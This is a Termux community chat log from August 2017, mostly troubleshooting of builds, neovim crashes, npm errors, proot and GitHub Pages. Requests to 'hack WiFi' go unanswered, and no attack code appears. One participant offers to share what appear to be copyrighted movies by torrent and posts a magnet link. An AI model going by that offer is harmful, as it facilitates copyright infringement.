2017-08-18 21:18:45 sdrausty not always of course just once in a while
2017-08-18 21:23:11 sdrausty @thank you for you amazing work :)
2017-08-18 21:23:46 sdrausty @thank *@fornwall thank
2017-08-18 21:26:14 sdrausty there are some minimalistic APKs in buildAPKs. Do U ‘ave any ffavorites?
2017-08-18 21:41:31 gitter (fornwall) Hitting sleep, great that the aapt problem is fixed, will push it as an update for everyone tomorrow!
2017-08-18 21:41:39 gitter (fornwall) Thanks for all the help!
2017-08-18 21:58:53 sdrausty @fornwall Tha
2017-08-18 21:59:38 sdrausty @fornwall You’re welcome and thank you once more!
2017-08-18 22:04:11 sdrausty I want to build on device! We need more native space on device https://github.com/termux/termux-packages/issues/1176
2017-08-18 22:05:25 sdrausty build *build more https://sdrausty.github.io/pages/more
2017-08-18 22:05:49 sdrausty need *want
2017-08-18 22:11:50 sdrausty 685 packages that are available
2017-08-18 22:12:03 sdrausty for Termux! :)
2017-08-18 22:12:20 sdrausty @termux.net
2017-08-18 22:27:36 gitter (Auxilus) My GitHub page is redirecting to tor.auxilus.io instead of Auxilus.github.io
2017-08-18 22:27:57 gitter (Auxilus) I also have CNAME file with Auxilus.github.io
2017-08-18 22:28:18 gitter (Auxilus) But still it redirects to tor.auxilus.com
2017-08-18 22:40:42 sdrausty @auxilus There us something peculiar about CNAME. I tried it to.
2017-08-18 22:40:51 sdrausty us *is
2017-08-18 22:41:43 gitter (Auxilus) So what can i do to fix it?
2017-08-18 22:41:56 gitter (Auxilus) I contacted github support…
2017-08-18 22:43:18 sdrausty maybe
2017-08-18 22:46:11 sdrausty read the focs
2017-08-18 22:46:21 sdrausty focs *docs
2017-08-18 22:46:31 sdrausty reread
2017-08-18 22:46:44 sdrausty and reread again
2017-08-18 22:47:18 sdrausty all the info dhould be in setting up pages webpages at github
2017-08-18 22:47:41 sdrausty websites kinda too
2017-08-18 22:48:16 sdrausty dhould be *should be
2017-08-18 22:53:09 gitter (Auxilus) Okay
2017-08-18 23:16:37 sdrausty it might not be a github issue
2017-08-18 23:16:56 sdrausty CNAME has two (2)
2017-08-18 23:17:46 sdrausty well two or more as far as I can telk
2017-08-18 23:18:08 sdrausty your CNAME provider is one
2017-08-18 23:18:24 sdrausty dns is one more
2017-08-18 23:18:46 sdrausty not to mention github
2017-08-18 23:19:04 sdrausty that’s three
2017-08-18 23:20:01 sdrausty are there anymore dependants fir a proper CNAME @github ?
2017-08-18 23:20:58 sdrausty telk *tell
2017-08-18 23:44:33 sdrausty @fornwall While we were discussing aapt my 🐕 throughput was dropping and remaining at 0/kbs usually it us in 💪 +💯/kbs and it tops out at +2/mbs
2017-08-18 23:44:51 sdrausty us *is
2017-08-18 23:46:41 sdrausty garbled screen in weechat on Termux, arghgg;)
2017-08-18 23:47:38 sdrausty max throughput on device
2017-08-18 23:48:21 sdrausty What is your max throughput (transmisdion rate)?
2017-08-18 23:55:55 sdrausty There are some incredible minimalist builds at https://github.com/sdrausty/buildAPKs and submodules.
2017-08-18 23:56:59 sdrausty Please post your opinion of the minimalistic APKs
2017-08-18 23:58:00 sdrausty Minimum source code, minimum options, maximum effect!
2017-08-18 23:58:29 sdrausty 2?
2017-08-19 01:37:23 droidoconner hi :) anyone awake?
2017-08-19 02:12:49 gitter (Ashish882) Hi
2017-08-19 02:13:09 gitter (Ashish882) Many are asking about hacking WiFi with termux
2017-08-19 02:13:45 gitter (Ashish882) Can there is way to hack WiFi . I know that not possible but if any or why not possible
2017-08-19 02:13:49 gitter (Ashish882) Tell me that too
2017-08-19 03:34:35 androidoconner hi is there any one here?
2017-08-19 04:53:41 live_the_dream 4?2
2017-08-19 04:53:42 live_the_dream ls
2017-08-19 04:53:52 live_the_dream \?
2017-08-19 05:57:00 monkey hey, anyone here?
2017-08-19 05:58:54 gitter (vishalbiswas) there is someone always
2017-08-19 06:02:40 gitter (vishalbiswas) live_the_dream: about openjdk can you try export those flags in BUILD_CXX or similar
2017-08-19 06:03:33 live_the_dream its -lpthread
2017-08-19 06:04:09 gitter (vishalbiswas) yes
2017-08-19 06:04:39 live_the_dream i wikk in a bit im seeing what aa4ch64 is doing
2017-08-19 06:04:39 gitter (vishalbiswas) i removed it from configure when i switched the abi from android to gnu
2017-08-19 06:05:43 live_the_dream seems some assembly is required
2017-08-19 06:05:47 live_the_dream or somethibg
2017-08-19 06:08:32 live_the_dream i will come back ti this later
2017-08-19 06:14:07 gitter (Ashish882) @vishalbiswas can you tell me how.to jack WiFi with termux
2017-08-19 06:14:07 gitter (Ashish882) @vishalbiswas
2017-08-19 06:14:22 gitter (Ashish882) I asking many time no one.replying
2017-08-19 06:17:07 monkey the termux apps on f-droid fail to install due to “an unknown error”. What’s wrong?
2017-08-19 06:31:49 gitter (vishalbiswas) @Ashish882 that’s because no one knows. You probably ask in some hacking forums/irc you will have better luck there
2017-08-19 06:33:30 gitter (vishalbiswas) monkey: do you have any termux apps installed?
2017-08-19 06:35:22 monkey i have the main termux app installed through play store
2017-08-19 06:36:57 gitter (vishalbiswas) That’s it
2017-08-19 06:37:22 gitter (vishalbiswas) All termux apps should be installed from same source
2017-08-19 06:37:43 monkey oh…
2017-08-19 06:38:10 monkey thank you! i will try installing it from f-droid
2017-08-19 08:34:15 gitter (Auxilus) Any one have good torrent trackers? @sdrausty?
2017-08-19 09:28:33 sdrausty aria2 & transmission
2017-08-19 09:33:22 gitter (Auxilus) Can you gimme tracker links?
2017-08-19 09:40:40 sdrausty I just sent two packages that deal with torrent on Termux.
2017-08-19 09:41:05 sdrausty two packages *two package names
2017-08-19 09:41:13 gitter (Auxilus) I got.torrent files
2017-08-19 09:41:26 gitter (Auxilus) Created with transmission itself
2017-08-19 09:41:54 gitter (Auxilus) But when i add .torrent to utorrent it doesn’t download the file
2017-08-19 09:42:15 gitter (Auxilus) (the file is seeding inside transmission)
2017-08-19 09:42:56 sdrausty great
2017-08-19 09:42:56 gitter (Auxilus) How can I fix it?
2017-08-19 09:43:05 sdrausty oh
2017-08-19 09:43:42 sdrausty what client are you using?
2017-08-19 09:43:44 gitter (Auxilus) Can you try on your bittorrent client?
2017-08-19 09:43:52 gitter (Auxilus) Im on uTorrent
2017-08-19 09:45:11 sdrausty @Auxilus I am leaving to go see the eclipse, Sorry, I’m too busy right now. Latter OK
2017-08-19 09:45:13 gitter (Auxilus) @sdrausty
2017-08-19 09:45:22 gitter (Auxilus) Np
2017-08-19 09:45:34 gitter (Auxilus) Whats eclipse?
2017-08-19 09:46:04 sdrausty 20170821 solar eclipse
2017-08-19 09:46:45 gitter (Auxilus) Kk
2017-08-19 09:46:45 gitter (Auxilus) Oo
2017-08-19 09:46:52 gitter (Auxilus) But its on 21
2017-08-19 09:47:04 gitter (Auxilus) Today is 19
2017-08-19 09:48:04 sdrausty I want yo be there before the crowd gets there.
2017-08-19 09:48:39 gitter (Auxilus) You goin’ at some hill station or something?
2017-08-19 09:49:38 sdrausty Just want to be in the path of totality. I was hoping yo go to Portland, OR
2017-08-19 09:49:44 sdrausty yo *to
2017-08-19 09:50:41 sdrausty Actualy on the Pacific coast southwest of Portland
2017-08-19 09:52:55 sdrausty They’ll see an amzing event at the beach.
2017-08-19 09:53:13 sdrausty amzing *amazing
2017-08-19 09:55:22 sdrausty Maybe I’ll make a page, Termux at the eclipse/eclipse in Termux at sdrausty.github.io
2017-08-19 10:08:54 sdrausty If the weather is great, that is.
2017-08-19 10:34:01 sdrausty https://www.google.com/search?q=portland+eclipse
2017-08-19 10:38:12 BrainDamage auxilius: ignore what sdrausty said, he mentioned torrent /clients/, not trackers
2017-08-19 10:38:22 sdrausty oh
2017-08-19 10:38:56 gitter (Auxilus) What should i do???
2017-08-19 10:39:01 gitter (Auxilus) I added 4 trackers
2017-08-19 10:39:09 gitter (Auxilus) Still not downloading at client
2017-08-19 10:39:19 sdrausty BrainDamage: Are there any torrent tracker pkgs?
2017-08-19 10:39:30 BrainDamage in termux? not that i know of
2017-08-19 10:39:47 BrainDamage altough, strictly speaking, a tracker is not requried for torrents to work
2017-08-19 10:39:50 gitter (Auxilus) How do i solve it?
2017-08-19 10:40:00 BrainDamage if you’re connected to the dht, the peers can exchange data
2017-08-19 10:40:12 BrainDamage and both transmission and aria support dht data exchange
2017-08-19 10:40:38 BrainDamage auxilius: first of all, determine if the tracker is seeing the peers
2017-08-19 10:40:53 BrainDamage and if the peers are connecting to the tracker
2017-08-19 10:40:59 gitter (Auxilus) Take a look at torrent that im seeding…
2017-08-19 10:41:09 gitter (Auxilus) http://f9c5e2d6.ngrok.io
2017-08-19 10:41:39 BrainDamage you shouldn’t give public remote access
2017-08-19 10:41:52 gitter (Auxilus) I gave
2017-08-19 10:41:59 BrainDamage give the .torrent or the magnet url
2017-08-19 10:41:59 gitter (Auxilus) http://f9c5e2d6.ngrok.io
2017-08-19 10:42:09 gitter (Auxilus) Ah.. Wait…
2017-08-19 10:42:39 BrainDamage so which of the 2 is it?
2017-08-19 10:42:49 BrainDamage 4.14 or stan?
2017-08-19 10:43:13 gitter (Auxilus) Stan
2017-08-19 10:43:26 gitter (Auxilus) Not i will add torrent to uTorrent…
2017-08-19 10:44:02 BrainDamage ok, as you can see in the status, it reports successful announcement on 3 trackers, 1 failed
2017-08-19 10:44:02 gitter (Auxilus) Added
2017-08-19 10:44:30 gitter (Auxilus) Ye but we need only 1 tracker…
2017-08-19 10:44:30 BrainDamage however, your peer list is empty
2017-08-19 10:44:54 gitter (Auxilus) I got 2leechers
2017-08-19 10:44:58 gitter (Auxilus) On 3rd tracker
2017-08-19 10:45:18 gitter (Auxilus) Also 5peers on tracker 1
2017-08-19 10:45:22 BrainDamage weird, the ui is not updating the peer list for me
2017-08-19 10:45:53 BrainDamage 3 leechers is the tracker global info
2017-08-19 10:45:59 BrainDamage not 3 leechers attached to you
2017-08-19 10:46:07 gitter (Auxilus) Hmm
2017-08-19 10:46:12 gitter (Auxilus) Wait lemme chk again
2017-08-19 10:46:23 BrainDamage your peer list is instead completely empty
2017-08-19 10:46:57 gitter (Auxilus) Where is peer list? I cant find
2017-08-19 10:47:01 gitter (Auxilus) Is it on ui
2017-08-19 10:47:02 gitter (Auxilus) ?
2017-08-19 10:47:57 gitter (Auxilus) How do I fix it?
2017-08-19 10:48:22 BrainDamage click on a torrent, click on the blue i
2017-08-19 10:48:33 BrainDamage then you see torrent details
2017-08-19 10:48:35 gitter (Auxilus) Then?
2017-08-19 10:48:39 BrainDamage the person icon is the peer list
2017-08-19 10:48:42 BrainDamage it’s empty
2017-08-19 10:48:51 gitter (Auxilus) Hmmm..
2017-08-19 10:49:00 gitter (Auxilus) Whats the problem then?
2017-08-19 10:49:05 gitter (Auxilus) Is it not seeding?
2017-08-19 10:49:42 BrainDamage no, it’s worse, you’re not seeing even the other seeders
2017-08-19 10:49:54 gitter (Auxilus) Shit man!
2017-08-19 10:49:55 BrainDamage you’re not communicating with the trackers properly
2017-08-19 10:50:11 gitter (Auxilus) Its transmission package…
2017-08-19 10:50:37 gitter (Auxilus) I created .torrent
file with it itself
2017-08-19 10:51:32 gitter (Auxilus) What do I do?
2017-08-19 10:52:39 gitter (Auxilus) ?
2017-08-19 10:53:36 gitter (Auxilus) Anyone?
2017-08-19 10:53:58 gitter (Auxilus) Shit 6 connections open on my ngrok
2017-08-19 10:54:07 gitter (Auxilus) Im closing the server
2017-08-19 11:22:41 gitter (themastersunil) CT
2017-08-19 11:23:00 gitter (themastersunil) sorry by mistake..😆😅
2017-08-19 11:23:24 gitter (themastersunil) wpscan is not working in termux, why?
2017-08-19 11:27:58 gitter (themastersunil) I’m fassing error in ‘getdtablesize’
2017-08-19 11:28:30 gitter (themastersunil) Tell me, how to fix this error? anyone is there?
2017-08-19 11:30:58 gitter (themastersunil) [ERROR] Function ‘getdtablesize’ not found in [libc.so]
2017-08-19 11:32:13 gitter (Hax4us) Hey all termux lovers plz look at this error and give solutions plz @sdrausty @vishalbiswas @fornwall proot info: vpid 1: terminated with signal 7
2017-08-19 11:35:23 gitter (themastersunil) Nobody is there 😥
2017-08-19 11:36:33 gitter (Hax4us) Gm to all..plz wake up…😂
2017-08-19 11:36:43 gitter (Hax4us) And help me
2017-08-19 11:47:10 gitter (AshleyNykiel) Any chance of adding source-highlight to the Termux repos to provide source code highlighting to Ranger file mananger: https://www.gnu.org/software/src-highlite/source-highlight.html
2017-08-19 11:54:45 gitter (Hax4us) Ncurses-dev is giving dpkg error after upgrading
2017-08-19 13:01:45 gitter (Auxilus) Any1 plz help me with my torrent issue
2017-08-19 13:04:23 gitter (Hax4us) @Auxilus all are sleeping..😂
2017-08-19 13:04:44 gitter (Hax4us) Wait …i also waiting
2017-08-19 13:04:56 gitter (Hax4us) m*
2017-08-19 13:05:40 gitter (Auxilus) :(
2017-08-19 14:36:36 gitter (Ashish882) What happen devil @Hax4us
2017-08-19 14:37:39 gitter (Auxilus) Any 1 have uTorrent or BitTorrent?
2017-08-19 14:37:45 gitter (Auxilus) Atm?
2017-08-19 14:37:55 gitter (Auxilus) @Ashish882?
2017-08-19 14:38:25 gitter (Auxilus) @everyone
2017-08-19 14:38:45 gitter (Auxilus) Plz try if
2017-08-19 14:38:45 gitter `magnet:?xt=urn:btih:6a338e33a0db21821e966ac0cbadb67ff1df1c76&dn=4.14.21.zip&tr=udp%3a%2f%2ftracker.opentrackr.org%3a1337%2fannounce&tr=udp%3a%2f%2ftracker.yify-torrents.com%2fannounce&tr=udp%3a%2f%2fopen.demonii.com%3a1337&tr=udp%3a%2f%2fexodus.desync.com%3a6969&tr=udp%3a%2f%2ftracker.istole.it%3a80&tr=udp%3a%2f%2ftracker.publicbt.com%3a80&tr=udp%3a%2f%2ftracker.leechers-paradise.org%3a6969&tr=udp%3a%2f%2f9.rarbg.com%3a2710&tr=udp%3a%2f%2ftr
2017-08-19 14:38:45 gitter udp%3a%2f%2ftracker.openbittorrent.com%3a80`
2017-08-19 14:38:48 gitter (Auxilus) Works
2017-08-19 14:39:11 gitter (Auxilus) I created this torrent and seeding from termux
2017-08-19 22:23:12 poyntz Is there any way to send a command to termux via the sharemenu or something?
2017-08-19 22:23:59 poyntz so say you’re in a browser, you copy a command you find to clipboard, is there any menu item that lets you send that command directly to bash?
2017-08-19 22:39:33 live_the_dreams paste ?
2017-08-19 22:45:16 poyntz naa. sorry - adding copy to the explanation didn’t help
2017-08-19 22:46:48 poyntz there’s an app called SearchBar Ex, which launches stuff around your android, you can type little commands into the searchbar to create new calendar events, new tasks, map directions, perform wiki searches,etc.. was wondering if there was a way to input a shell command to execute that shell command in termux
2017-08-19 22:47:29 poyntz if you’re familiar with an application called ‘Alfred 2’ in that application you can type > followed by a command and it executes the command in your preferred terminal
2017-08-19 22:47:50 live_the_dreams no idea sorry
2017-08-19 22:48:43 live_the_dreams there might be a way i don’t know
2017-08-19 22:48:57 poyntz no worries.. as a bit of a workaround can type > in SearchBar Ex which launches termux directly, then can type the command direct into termux
2017-08-19 22:49:20 poyntz but it’s not as nice as firing the command into searchbar directly
2017-08-19 22:49:28 poyntz then launching the command inside termux
2017-08-19 22:54:46 poyntz so if you type input, ‘man cat | less’ into SearchBar, the executed command output displays in termux |
2017-08-19 22:54:46 poyntz rather than typing it directly into termux
2017-08-19 23:31:42 rods-tab3 there is termux app to paste clipboard to your termux window
2017-08-20 01:56:10 gitter (Hax4us) tar is giving error :– bus error
2017-08-20 01:56:24 gitter (Hax4us) While extracting a .tar.xz file
2017-08-20 01:58:36 gitter (Hax4us) @sdrausty @vishalbiswas @everyone
2017-08-20 02:09:07 gitter (vishalbiswas) inside proot?
2017-08-20 04:11:35 gitter (Hax4us) proot info: vpid 1: terminated with signal 4
2017-08-20 04:12:06 gitter (Hax4us) Anybody have any solution
2017-08-20 03:23:37 u0_a189 hey
2017-08-20 03:24:57 u0_a189 the programs installed via apt were not accessible via root
2017-08-20 03:25:13 gitter (suryapoo) $ npm install react react-dom –save
2017-08-20 03:25:13 gitter (suryapoo) npm ERR! Linux 3.4.0-g7717f76
2017-08-20 03:25:13 gitter (suryapoo) npm ERR! argv “/data/data/com.termux/files/usr/bin/node” “/data/data/com.termux/files/usr/bin/npm” “install” “react” “react-dom” “–save”
2017-08-20 03:25:13 gitter (suryapoo) [full message: https://gitter.im/termux/termux?at=5999476776a757f808c38fd1]
2017-08-20 03:25:33 gitter (suryapoo) Guys im getting the above error when i try to install react and react-dom
2017-08-20 03:25:46 u0_a189 i changed root’s $PATH so it “sees” them
2017-08-20 03:26:00 u0_a189 but the programs say they need libraries
2017-08-20 03:26:09 u0_a189 so what should i do?
2017-08-20 03:27:56 u0_a189 when i get on root via tsu it “sees” the programs, but says “permission denied”
2017-08-20 03:36:22 u0_a189 anyone here?
2017-08-20 03:41:53 u0_a189 k, found the way to do it
2017-08-20 03:42:08 u0_a189 bye
2017-08-20 05:52:00 gitter (Auxilus) Anyone online ATM?
2017-08-20 05:52:40 gitter (gabasch01) root
2017-08-20 05:53:13 gitter (Auxilus) Hey @gabasch01
2017-08-20 05:53:23 gitter (Auxilus) Do you have torrent client atm?
2017-08-20 05:54:18 gitter (Auxilus) Can anyone try to download transformers from http://9787a8bb.ngrok.io?
2017-08-20 05:54:38 gitter (Auxilus) Just download and open torrent file in client
2017-08-20 05:55:01 gitter (gabasch01) thanks
2017-08-20 05:55:42 gitter (Auxilus) @gabasch01 for?
2017-08-20 05:55:54 gitter (Auxilus) Im not seeding interstellar
2017-08-20 05:56:42 gitter (Auxilus) Im seeding kalifs and friends seasona and transformers
2017-08-20 05:59:47 gitter (Auxilus) Tell me movie name, ill upload the torrent
2017-08-20 07:24:08 gitter (cr4shcod3) Hello
2017-08-20 08:33:01 gitter (Hax4us) I have success fully installed Ubuntu proot but I m trying to reinstall Ubuntu proot amd I don’t know how and why ….tar is giving error while extracting Ubuntu.tar.gz file
2017-08-20 08:33:26 gitter (Hax4us) tar: bin/rbash: Cannot change mode to rwxrwxrwx: No such file or directory
2017-08-20 08:33:26 gitter (Hax4us) tar: bin/ypdomainname: Cannot change mode to rwxrwxrwx: No such file or directory
2017-08-20 10:28:57 gitter (mklein994) @fornwall nodejs-current
is not letting me install anything globally. I’m on arm Android 7.1, is anyone else having problems?
2017-08-20 10:33:00 gitter (mklein994) @fornwall https://gist.github.com/mklein994/e349522e2e84923bb1d2fc8df1deb1ac
2017-08-20 12:05:02 gitter (fornwall) @mklein994 hm, could it be that the updated npm in nodejs-current tries to do a file system hard link (which android does not allow)?
2017-08-20 12:05:25 gitter (fornwall) I get ```$ npm install -g gitter-irc-bot
2017-08-20 12:05:25 gitter (fornwall) Unhandled rejection Error: EACCES: permission denied, link ‘/data/data/com.termux/files/home/.npm/_cacache/tmp/c2e85417’ -> ‘/data/data/com.termux/files/home/.npm/_cacache/content-v2/sha512/12/a0/6d91bc0e780ece9e2deac64c71a4873db990b5d4e28c1610235248de1c993ef1010e251db2fa9787ad7d2e689948ca1c78d455bc06139c66bd5e35c83296’```
2017-08-20 12:09:41 gitter (mklein994) Yeah, that’s a very similar error to the gist I gave a link to. That was my feeling. I’m not sure, but I seem to remember that the other nodejs
package had a patch around it. I don’t know enough to help there, but is this an easy fix?
2017-08-20 16:46:30 gitter (fornwall) @mklein994 hm, it doesn’t seem like an easy fix, npm v5 seems to use file system hard links for lock files and cache files
2017-08-20 19:22:34 sdrausty @forwall sed
?
2017-08-20 19:24:11 sdrausty It shouldn’t be difficult to change hard code to soft code.
2017-08-20 19:24:36 sdrausty find everything and change it
2017-08-20 22:05:17 live_the_dream_s hmm you can’t build vim after you build libvterm
2017-08-20 22:05:36 live_the_dream_s vim build fails hard
2017-08-20 22:43:12 live_the_dream_s pull request fix
2017-08-21 01:08:51 Vahid Hi
2017-08-21 01:12:35 Termix Why Java is not supported? Is there a possibility that it will be added?
2017-08-21 01:14:30 live_the_dream_s umm the jdk and jvm is availabl3 for all archs buy aarch64 but its not stable on arm and i dunno bout x86
2017-08-21 03:41:56 azarus How can I disable command-not-found? It slows down my prompt, but ‘apt remove command-not-found’ wants to remove packages I need :(
2017-08-21 05:00:31 frumpylava azarus: bash or zsh?
2017-08-21 05:01:33 frumpylava azarus: in zsh you can just run unset -f command_not_found_handler
from your .zshrc
2017-08-21 05:02:07 gitter (Hax4us) @frumpylava tar is not working while extracting
2017-08-21 05:02:57 frumpylava azarus: actually that should work in both bash and zsh
2017-08-21 05:03:12 frumpylava @Hax4us why not?
2017-08-21 05:04:18 gitter (Hax4us) @frumpylava lol i m asking u
2017-08-21 05:04:47 gitter (Hax4us) tar: bin/rbash: Cannot change mode to rwxrwxrwx: No such file or directory
2017-08-21 05:04:47 gitter (Hax4us) tar: bin/ypdomainname: Cannot change mode to rwxrwxrwx: No such file or directory
2017-08-21 05:10:54 frumpylava @Hax4us hmm works for me.
2017-08-21 05:11:19 azarus frumpylava: I commented out command_not_handler in /data/data/com.termux/files/usr/etc/zshrc
2017-08-21 05:11:23 azarus Seems to work.
2017-08-21 05:12:06 azarus (only for zsh of course)
2017-08-21 05:12:17 gitter (Hax4us) Tar is working also for me but gives error only while extracting ubuntu.tar.gz file
2017-08-21 05:14:59 live_the_dream_s couid be hard links?
2017-08-21 05:15:59 gitter (Hax4us) So..how to extract then..@live_the_dream_s
2017-08-21 05:17:21 gitter (Hax4us) proot –link2symlink tar -xf Ubuntu.tar.gz is it r8 way…?
2017-08-21 05:20:21 live_the_dream_s can’t remember
2017-08-21 05:21:21 gitter (Hax4us) 😶😑
2017-08-21 05:21:42 gitter (Hax4us) Anybody else..?
2017-08-21 05:22:52 live_the_dream_s https://github.com/termux/termux-packages/issues/1054
2017-08-21 05:22:53 live_the_dream_s ?
2017-08-21 05:24:29 gitter (Hax4us) Thnx I will try
2017-08-21 05:55:02 azarus https://github.com/termux/termux-packages/issues/1054
2017-08-21 05:55:13 azarus Sorry, copy/paste went wrong.
2017-08-21 05:56:13 gitter (Hax4us) Means ? @azarus
2017-08-21 05:58:09 azarus Disregard that message, if you will :)
2017-08-21 09:23:48 gitter (Ashish882) Hi
2017-08-21 09:24:34 gitter (Ashish882) Somey time I try to open github.com it can’t open what’s a region did any know
2017-08-21 09:26:37 u0_a97 hi guys
2017-08-21 09:27:23 u0_a97 why I can’t use mpv ?
2017-08-21 09:28:38 u0_a97 guys ?
2017-08-21 12:14:50 gitter (Ashish882) Hi
2017-08-21 12:14:50 gitter (Ashish882) Anyone
2017-08-21 12:15:04 gitter (Ashish882) How to install fedora25 in termux
2017-08-21 12:15:35 gitter (Ashish882) @vishalbiswas @fornwall
2017-08-21 12:15:45 gitter (Hax4us) Bro i think u know already
2017-08-21 12:16:27 gitter (Ashish882) Fedora 25
2017-08-21 12:16:37 gitter (Ashish882) That is fedora
2017-08-21 12:17:23 gitter (Hax4us) No that was fedora 25
2017-08-21 12:18:06 gitter (Ashish882) Which one
2017-08-21 12:18:12 gitter (Hax4us) u can ask in group bro ….90% members have installed fedora 25
2017-08-21 12:18:41 gitter (Ashish882) Really that is fedora25
2017-08-21 12:18:45 gitter (Hax4us) Yes
2017-08-21 12:18:54 gitter (Ashish882) Ohh I thought
2017-08-21 12:18:58 gitter (Ashish882) It not
2017-08-21 12:19:12 gitter (Ashish882) Fedora 25 is another thing
2017-08-21 12:19:15 gitter (Ashish882) Lol
2017-08-21 12:19:17 gitter (Hax4us) U can also install 26
2017-08-21 12:19:43 gitter (Ashish882) Fatrat in fedora25
2017-08-21 12:19:58 gitter (Ashish882) Possible
2017-08-21 12:20:11 gitter (Ashish882) I see screen shot
2017-08-21 16:09:28 nitrospectide How can I get Termux to gen and use my RSA key in ~/.ssh instead of deep in /data/data/com/termux/files/home?
2017-08-21 16:32:32 ParkerR nitrospectide, /data/data/com/termux/files/home IS `/ is it not?
2017-08-21 16:32:34 ParkerR *~/
2017-08-21 16:34:09 nitrospectide ParkerR: My scenario was that I wanted to use a GUI text editor app to edit one of my keys, but I can’t get to that folder.
2017-08-21 16:34:40 ParkerR Ahh yeah because of the sandboxing
2017-08-21 16:34:44 ParkerR Data read only by default
2017-08-21 16:34:52 ParkerR Hmm
2017-08-21 16:35:45 nitrospectide The editor won’t nav past the first /data folder. It sees nothing there.
2017-08-21 16:36:19 ParkerR Yes, because if you arent rooted you cant see those files
2017-08-21 16:36:32 ParkerR Only applications that opwn the files can see their own folders without root
2017-08-21 16:36:36 ParkerR *own
2017-08-21 19:30:24 gitter (mklein994) I’m getting an error when I quit Neovim:
2017-08-21 19:32:29 gitter (mklein994) ```bash session
2017-08-21 19:34:54 gitter (mklein994) @mklein994 formatting on mobile is hard
2017-08-21 19:35:52 gitter (mklein994) Is this happening to anyone else?
2017-08-21 19:41:09 gitter (mklein994) I fixed the error message to be easier to reproduce.
2017-08-21 20:07:05 live_the_dream_s im getting error exiting nvim time to do some debugging
2017-08-21 20:15:51 live_the_dream_s no bugs on x86_64
2017-08-21 20:17:07 live_the_dream_s seems to be aarch64 only im getting?
2017-08-21 20:22:06 live_the_dream_s https://pastebin.com/BM3k3V6C
2017-08-21 20:22:07 live_the_dream_s ?
2017-08-21 20:25:46 live_the_dream_s also unibilium.c:735: const char *unibi_get_str(const unibi_term *, enum unibi_string): assertion “v > unibi_string_begin_ && v < unibi_string_end_” failed
2017-08-21 20:34:22 gitter (mklein994) That last one about unibilium.c
is the exact same error that I got. It also messes with the terminal; scrolling is broken among a few other things.
2017-08-21 20:35:09 live_the_dream_s yeah
2017-08-21 20:35:32 live_the_dream_s since it isn’t doing it on x86_64 or arm? you are using aarch64 right?
2017-08-21 20:35:54 gitter (mklein994) Actually no, Android 7.1.2 arm.
2017-08-21 20:36:11 live_the_dream_s could be a 7.1 issue then
2017-08-21 20:36:23 live_the_dream_s my only 7.0 ++ device is aarch64
2017-08-21 20:36:27 live_the_dream_s k there we go
2017-08-21 20:36:57 live_the_dream_s now to figure wtf changed?
2017-08-21 20:37:18 gitter (mklein994) It hasn’t been like that before… there’s probably been a lot of changes between the releases on termux.net.
2017-08-21 20:37:38 live_the_dream_s yeah could be ncurses since htat has been updated a lot
2017-08-21 20:37:57 live_the_dream_s could be lots of things
2017-08-21 20:40:03 gitter (mklein994) This has been the last change: https://github.com/termux/termux-packages/commit/0bb0e20a36ace786ffc3745931376157e7334866
2017-08-21 20:40:06 live_the_dream_s nope getting error
2017-08-21 20:40:10 live_the_dream_s on x86_64
2017-08-21 20:40:12 live_the_dream_s now
2017-08-21 20:40:42 gitter (mklein994) Specifically https://github.com/termux/termux-packages/blob/0bb0e20a36ace786ffc3745931376157e7334866/packages/neovim/build.sh
2017-08-21 20:41:50 live_the_dream_s wasn’t getting the issue until i existed termux and restarted app
2017-08-21 20:42:10 gitter (mklein994) Huh. That’s wierd.
2017-08-21 20:42:22 live_the_dream_s after update of stuff
2017-08-21 20:42:29 live_the_dream_s like im using the same nvim
2017-08-21 20:42:42 live_the_dream_s could be libandroid-support issue
2017-08-21 20:44:48 gitter (mklein994) By the looks of things, the last commit just barely added windows support for :terminal
, and ci builds failed on that one.
2017-08-21 20:44:49 live_the_dream_s nope im wrong again
2017-08-21 20:45:08 live_the_dream_s i screwed up
2017-08-21 20:45:23 live_the_dream_s too many terminals with different archs and versions of termux
2017-08-21 20:45:53 gitter (mklein994) Yeah, it gets complicated quick. :wink:
2017-08-21 20:46:22 live_the_dream_s arm is screwed not x86_64
2017-08-21 20:46:43 gitter (mklein994) OK… we’re getting closer.
2017-08-21 20:48:29 live_the_dream_s works in tmux ?
2017-08-21 20:49:02 live_the_dream_s yep
2017-08-21 20:49:28 gitter (mklein994) Whoa! Neovim crashes before I do anything.
2017-08-21 20:49:56 live_the_dream_s i was getting that … then it worked in tmux now it is breaking on x86_64
2017-08-21 20:49:59 gitter (mklein994) OK, but not with nvim -u NONE
.
2017-08-21 20:50:23 gitter (mklein994) …or -u NORC
.
2017-08-21 20:50:37 gitter (mklein994) (not crashing)
2017-08-21 20:54:42 Hackz How to use apache2 in termux
2017-08-21 20:55:48 live_the_dream_s figured it out
2017-08-21 20:55:56 live_the_dream_s export TERM=screen
2017-08-21 20:55:58 live_the_dream_s no crash
2017-08-21 20:57:28 gitter (mklein994) I have tmux-256color
as my default terminal in ~/.tmux.conf
2017-08-21 20:58:19 gitter (mklein994) Interesting: TERM=tmux nvim
crashes immediately.
2017-08-21 21:00:08 gitter (mklein994) Even when set inside of ~/.tmux.conf
.
2017-08-21 21:02:33 gitter (mklein994) live_the_dream_s: manually setting $TERM
is a bad idea, as far as I know.
2017-08-21 21:17:50 live_the_dream_s its preferable to app exiting a nd the screen output is broken
2017-08-22 02:05:12 frumpylava I have manually set my TERM to screen-256color
, even though I am using tmux. It works just as well, but it’s easier when interacting with legacy servers over ssh running old linuxes where tmux wasn’t a thing.
2017-08-22 04:26:23 deepakbndeepu whats wrong with install.sh? https://usercontent.irccloud-cdn.com/file/htXWZMyW/Screenshot_20170822-135432.png
2017-08-22 04:30:54 gitter (refacto) I’m getting segfaults with aria2… Any tips on resolving the issue?
2017-08-22 04:31:07 gitter (refacto) I’m on a OnePlus One with Android 7.1.2
2017-08-22 04:33:15 gitter (refacto) Should I try building it for myself?
2017-08-22 05:45:02 gitter (fornwall) I’m looking at the libunibilium assertion that fails when exiting neovim and corrupts the terminal (run reset
to reset the terminal if it happens to you)
2017-08-22 05:58:14 azarus I have a docker environment now, but when I run ./scripts/run-docker.sh ./build-package.sh -a arm aria2 this shows up: https://dpaste.de/hD7Q
2017-08-22 05:58:17 azarus Any help?
2017-08-22 06:03:39 gitter (fornwall) live_the_dream, @mklein994 : I wrote about it in https://github.com/neovim/neovim/pull/7204
2017-08-22 06:03:53 gitter (fornwall) hopefully we can get a reply there soon
2017-08-22 06:17:14 frumpylava deepakbndeepu: Your screenshot doesn’t work for me. I’m getting permission denied.
